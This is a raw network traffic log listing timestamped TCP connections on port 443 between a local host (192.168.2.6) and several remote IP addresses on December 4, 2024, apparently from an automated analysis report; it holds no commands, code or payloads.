                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.934837103 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.934890032 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.934972048 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.935095072 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.935115099 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.935785055 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.935801983 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.935847998 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.936079025 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.936103106 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.936708927 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.936722994 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.936925888 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.936942101 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.937062979 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.937071085 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.056583881 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.056657076 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.056735992 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.056994915 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.057018042 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.081865072 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.081932068 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.082326889 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.083458900 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.083477974 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.173932076 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.173978090 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.174236059 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.176017046 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.176043987 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.176162004 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.177390099 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.177414894 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.177639961 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.177661896 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.518984079 CET44350077159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.519071102 CET44350077159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.519110918 CET50077443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.519151926 CET50077443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.520240068 CET50077443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.520257950 CET44350077159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685067892 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685129881 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685199022 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685203075 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685239077 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685296059 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685357094 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685395956 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685463905 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685472012 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685481071 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685516119 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685698032 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685707092 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685801029 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685837984 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685847044 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.685898066 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686033964 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686052084 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686127901 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686144114 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686299086 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686305046 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686311007 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686325073 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686443090 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686450958 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686482906 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.686491013 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.947782993 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.947840929 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.948038101 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.948374987 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:27.948389053 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.301958084 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.302030087 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.302638054 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.302648067 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304691076 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304702997 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304785967 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304796934 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304801941 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304806948 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304846048 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304848909 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304892063 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304902077 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304922104 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304930925 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304940939 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304944038 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.304965019 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305006027 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305038929 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305051088 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305085897 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305124998 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305166006 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305172920 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305203915 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305218935 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305228949 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305324078 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.305327892 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.395360947 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.395654917 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.395675898 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.396302938 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.396598101 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.396759987 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.396928072 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.439044952 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.653085947 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.653386116 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.653399944 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.654449940 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.654525995 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.655632019 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.655742884 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.655879974 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.655889034 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.664989948 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.665277958 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.665302038 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.667716026 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.667929888 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.667949915 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.668061018 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.668116093 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.668415070 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.668581963 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.668962002 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.669017076 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.669258118 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.669307947 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.669318914 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.669374943 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.669383049 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.703938007 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.704346895 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.704392910 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.704521894 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.707355022 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.707432032 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.708549023 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.708745003 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.708755016 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.711791992 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.719676018 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.719676018 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.719695091 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.727648020 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.727919102 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.727940083 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.728265047 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.729836941 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.729914904 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.730066061 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.730082035 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.730364084 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.730444908 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.730648994 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.730660915 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.731143951 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.731206894 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.731497049 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.731559992 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.731648922 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.751995087 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.752034903 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.765279055 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.765542030 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.765584946 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.766870022 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.766962051 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.767982960 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.769268036 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.769352913 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.769654036 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.769663095 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.769685030 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.770169973 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.775330067 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.784917116 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.786037922 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.786058903 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.790721893 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.791007996 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.791027069 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.791394949 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.791753054 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.791827917 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.791979074 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.801053047 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.815201998 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.830296040 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.835329056 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.848591089 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.848855972 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.848874092 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.850402117 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.850475073 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.851665974 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.851753950 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.851895094 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.851905107 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.893654108 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.914964914 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.915276051 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.915297031 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.916907072 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.916971922 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.917149067 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.919526100 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.919625998 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.920022964 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.920036077 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.920308113 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.920320034 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.921556950 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.921632051 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.922092915 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.922758102 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.926069021 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.926081896 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.956429958 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.956443071 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.963871002 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.963922977 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.964019060 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.964026928 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.965187073 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.965249062 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.965992928 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.966062069 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.971944094 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.972542048 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.980137110 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.980315924 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.980804920 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.981020927 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.981038094 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.981045008 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.981131077 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:28.981306076 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.002096891 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.011162996 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.011198044 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.012279034 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.012350082 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.013087034 CET4435009823.57.90.101192.168.2.6
